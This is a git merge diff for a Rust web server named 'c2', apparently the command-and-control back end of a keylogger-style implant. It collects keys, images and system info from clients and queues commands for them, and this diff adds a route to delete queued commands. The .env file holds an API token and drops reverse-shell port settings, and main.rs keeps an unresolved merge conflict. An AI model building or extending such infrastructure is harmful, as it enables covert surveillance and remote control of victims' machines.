Merge branch 'main' into 'elio-server'

# Conflicts:
#   c2/Cargo.toml
#   c2/src/db.rs
#   c2/src/main.rs

.env

 IS_LOADED = 1 # DO NOT REMOVE THIS LINE
 
 #NEEDED FOR BOTH CLIENT AND SERVER
-ROCKET_ADDRESS = "127.0.0.1"
+ROCKET_ADDRESS = "192.168.122.1"
 ROCKET_PORT = "8888"
 KEY_API = "/keys"
 IMAGE_API= "/images"
@@ -10,8 +10,6 @@ INFO_API = "/info"
 COMMANDS_API="/commands"
 BUFFERMAXLEN = 50
 API_TOKEN = "cbbYrcu6BkM6dSnmzMU0BWZMlxqrIboT"
-SHELL_PORT = "4444"
-SHELL_IP = "127.0.0.1"
 
 #NEEDED FOR SERVER
 

Cargo.lock

@@ -205,9 +205,7 @@ dependencies = [
  "rocket",
  "rocket_dyn_templates",
  "rocket_sync_db_pools",
- "serde",
  "sharedlib",
- "tera",
 ]
 
 [[package]]

c2/Cargo.toml

@@ -8,9 +8,7 @@ edition = "2021"
 [dependencies]
 sharedlib = {path= "../sharedlib"}
 rocket = { version = "=0.5.0-rc.3", features = ["json"] }
-serde = { version = "1.0", features = ["derive"] }
-tera = "1.0"
-chrono = "0.4.31"
+
 
 [dependencies.rocket_sync_db_pools]
 version = "=0.1.0-rc.3"

c2/src/db.rs

@@ -222,6 +222,7 @@ pub async fn get_command_result(db_conn: &DbConnection, client_id: i32) -> Resul
     Ok(results)
 }
 
+
 pub async fn add_image(db_conn: &DbConnection, path: String, client_id : i32) -> Result<(),status::Custom<String>> {
     let image = NewImage {path: path, client_id: client_id};
     db_conn.run(move |conn| {
@@ -238,3 +239,12 @@ pub async fn get_images(db_conn: &DbConnection, client_id : i32) -> Result<Vec<S
         .map_err(|e| status::Custom(Status::InternalServerError, e.to_string()))?;
     Ok(results)
 }
+
+pub async fn delete_command_by_id(db_conn: &DbConnection, id: i32) -> Result<(),status::Custom<String>>{
+    db_conn.run(move |conn| {
+        diesel::delete(commands::table.filter(commands::id.eq(id))).execute(conn)
+       .map_err(|e| status::Custom(Status::InternalServerError, e.to_string())) // TODO: log this
+    }).await?;
+    Ok(())
+}
+

c2/src/main.rs

@@ -3,7 +3,12 @@ use sharedlib::config::load_dotenv;
 use std::sync::Mutex;
 use c2::backup::{DataFile, DataType};
 use c2::server::DbConnection;
-use c2::routes::{home, post_key, get_json_keys, get_html_clients, post_systeminfo, post_new_command, get_json_commands, post_command, get_new_commands, post_image};
+use c2::routes::{
+    home, post_key, get_json_keys, get_html_clients,
+    post_systeminfo, post_new_command, get_json_commands, 
+    post_command, get_new_commands, get_delete_command,
+    post_image
+};
 use rocket_dyn_templates::Template;
 use rocket::fs::FileServer;
 
@@ -33,7 +38,15 @@ fn rocket() -> _ {
     // load rocket
     let build = rocket::build().attach(DbConnection::fairing()).attach(Template::fairing()); 
     println!("Connecting to database ...");
+<<<<<<< c2/src/main.rs
     build.mount("/", routes![home, post_key, get_json_keys, get_html_clients, post_systeminfo, post_new_command, get_json_commands, post_command, get_new_commands, post_image])
+=======
+    build.mount("/", 
+        routes![home, post_key, get_json_keys, get_html_clients, 
+        post_systeminfo, post_new_command, get_json_commands, 
+        post_command, get_new_commands, get_delete_command
+    ])
+>>>>>>> c2/src/main.rs
     .mount("/static", FileServer::from("c2/templates/static"))
     .mount("/client/data", FileServer::from("./data"))
     .register("/", catchers![not_found, internal_error])

c2/src/routes.rs

@@ -103,11 +103,11 @@ pub async fn post_systeminfo(db_conn:DbConnection, auth:ApiClient, sysinfo: Json
 }
 
 #[post("/newcommand", data="<command>")]
-pub async fn post_new_command(db_conn:DbConnection, command : Form<CommandForm>) -> Result<String,status::Custom<String>> {
+pub async fn post_new_command(db_conn:DbConnection, command : Form<CommandForm>) -> Result<(),status::Custom<String>> {
 
     add_command(&db_conn, command.into_inner()).await?;
 
-    Ok(String::from("Command added"))
+    Ok(())
 } 
 
 #[get("/newcommand/<id>")]
@@ -132,3 +132,9 @@ pub async fn post_command(db_conn:DbConnection, mut result: Json<EncryptedResult
     add_command_result(&db_conn, result.into_inner()).await?;
     Ok(())
 }
+
+#[get("/deletecommand/<id>")]
+pub async fn get_delete_command(db_conn:DbConnection, id:i32) -> Result<(),status::Custom<String>> {
+    delete_command_by_id(&db_conn, id).await?;
+    Ok(())
+}
\ No newline at end of file

c2/src/server.rs

@@ -15,6 +15,7 @@ pub struct ApiClient{
     pub socketaddr:SocketAddr
 }
 
+
 #[derive(Debug)]
 pub enum ApiAuthError {
     IdError,

c2/templates/client.html.tera

@@ -40,10 +40,12 @@
         </div>
       </div>
     </div>
-    <h3 class="mt-5" style="text-align:center">Data sent</h3>
-    <button class="btn btn-primary" type="button" data-bs-toggle="collapse" data-bs-target="#keys" aria-expanded="false" aria-controls="keys">
+    <div class="mt-4" style="text-align:center">
+      <h3 class="mt-5">Data sent</h3>
+      <button class="btn btn-outline-dark mb-5" type="button" data-bs-toggle="collapse" data-bs-target="#keys" aria-expanded="false" aria-controls="keys">
         Show keys
       </button>
+    </div>
     <div class="w-75 mx-auto mt-2 collapse" id="keys">
       <table class="table" id="data">
         <thead>

c2/templates/commands.html.tera

 {% extends "base" %}
 {% block content %}
-<h3> Send commands </h3>
-<form action="/newcommand" method="post">
+<h3 class="mt-4" style="text-align:center"> Send commands </h3>
+<form id="form" action="#" method="post" class="mt-3" style="text-align:center">
     <label for="command">Choose a command :</label>
     <select id="command" name="command">
         {% for c in commands %}
@@ -10,15 +10,19 @@
     </select>
     <input type="text" placeholder="Option" name=option id="option" />
     <input name="client_id" type="hidden" value={{id}} />
-    <input type="submit" /> 
+    <input type="submit" id="submit" /> 
+    <div id="errorMsg" style="display:none;" class="alert alert-danger w-25 mx-auto mt-3" role="alert">
+        Error sending command
+    </div>
 </form>
-<h3> Pending commands </h3>
-<table class="table">
+<h3 class="mt-4" style="text-align:center"> Pending commands </h3>
+<table class="table w-50 border mx-auto mt-3">
     <thead>
         <tr>
             <th scope="col">Id</th>
             <th scope="col">Command</th>
             <th scope="col">Option</th>
+            <th></th>
         </tr>
     </thead>
     <tbody>
@@ -27,12 +31,17 @@
                 <th scope="row">{{loop.index}}</th>
                 <td class="mw-20">{{commands[command.command]}}</td>
                 <td>{{command.option}}</td>
+                <td>
+                    <div style="text-align:right">
+                        <button class="m-2 mb-4 text-center btn btn-secondary active" value="{{command.id}}" id="delete"> Delete Command </button>
+                    </div>
+                </td>
             </tr>
         {% endfor %}
     </tbody>
 </table>
-<h3> Commands results </h3>
-<table class="table">
+<h3 class="mt-4" style="text-align:center"> Commands results </h3>
+<table class="table w-75 border mx-auto mt-3">
     <thead>
         <tr>
             <th scope="col">Id</th>
@@ -51,3 +60,38 @@
     </tbody>
 </table>
 {% endblock content %}
+{% block scripts %}
+  <script src="/static/jquery/jquery-3.7.0.min.js"></script>
+  <script src="/static/bootstrap/js/bootstrap.min.js" crossorigin="anonymous"></script>
+
+  <script>
+ 
+    $(document).ready(function(){
+        $('#form').submit(function(e){
+            e.preventDefault();
+            $.ajax({
+                url: '/newcommand',
+                type : 'post',
+                data : $('#form').serialize(),
+                success : function(){
+                    location.reload(true);
+                },
+                error : function(){
+                    $("#errorMsg").show();
+                }
+            });
+        });
+
+        $('#delete').click(function(e){
+            e.preventDefault();
+            $.ajax({
+                url: '/deletecommand/'+ document.querySelector('#delete').value,
+                type: 'get',
+                success:function(){
+                    location.reload(true);
+                }
+            });
+        });
+    });
+  </script>
+{% endblock scripts %}